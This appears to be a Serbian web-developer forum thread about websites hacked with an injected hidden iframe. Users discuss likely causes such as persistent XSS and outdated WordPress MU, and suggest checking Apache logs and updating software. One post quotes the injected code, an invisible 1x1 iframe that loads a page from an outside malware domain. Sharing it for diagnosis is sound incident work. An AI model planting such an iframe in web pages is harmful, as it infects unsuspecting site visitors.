Hackovanje i <iframe>
Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove.
Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom. Evo koda koji je ostao na jednoj od stranica: Kôd:
-->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe> |
Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne.
|
Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust.
|
ako koristis smarty pogledaj da li nije malo zastareo :)
|
Ivane, XSS se moze manifestovati samo uz akcije posetilaca.
Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu :) Da lici na nekog bot-a, ali tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima. Da nisi mozda koristio OScommerce?!? Pozdrav. |
mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom..
inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali... |
@LiquidBrain
Malo ti je nejasan zakljucak, XSS se manifestuje prilikom posete korisnika ali takodje moze da postoji na stranici kao npr neki komentar na nekom busnom blog enginu ... zato sam i napisao "persistent XSS". Mada moze da bude i bilo sta drugo ali mi je ovaj tip napada prvi pao napamet zbog "bot" pristupa. O kom software-u je rec ? |
Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu. U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno).
|
Softver je WordPress MU. Jeste, verzija MU-a jeste zastarela, nisma koristio taj softver i eto. Mada su mi hakovali i sajtove sa cistim php i html fajlovima, bez ikakvog CMS-a.
Sad cu da update-ujem software pa ce vidimo kom opanci ... |
Bitno je da znaš kako su "ušli", fajlovi koje su hakovali su nebitni.
Možeš upasti na jednom mestu i izmeniti milion fajlova. Upadneš kroz WP MU na primer, projuriš sve fajlove sa .html ekstenzijom i ako je pisanje moguće dodaš šta god hoćeš u njih. Ulaz - 1, izmenjenih fajlova - mlogo :D Zato uglavnom dajem savete ljudima da izbegavaju free skripte. Treba da ih nadlgedas i krpiš non stop ako ne želiš da navučeš neku bedu. Komercijalni i custom CMS-ovi su manje popularni i u nekim slučajevima dobro napisani tako da si manje ugrožen. No, koliko para toliko muzike :D |
Vreme je GMT +2. Trenutno vreme je 06:59. |
Powered by vBulletin® Verzija 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © DevProTalk. All Rights Reserved.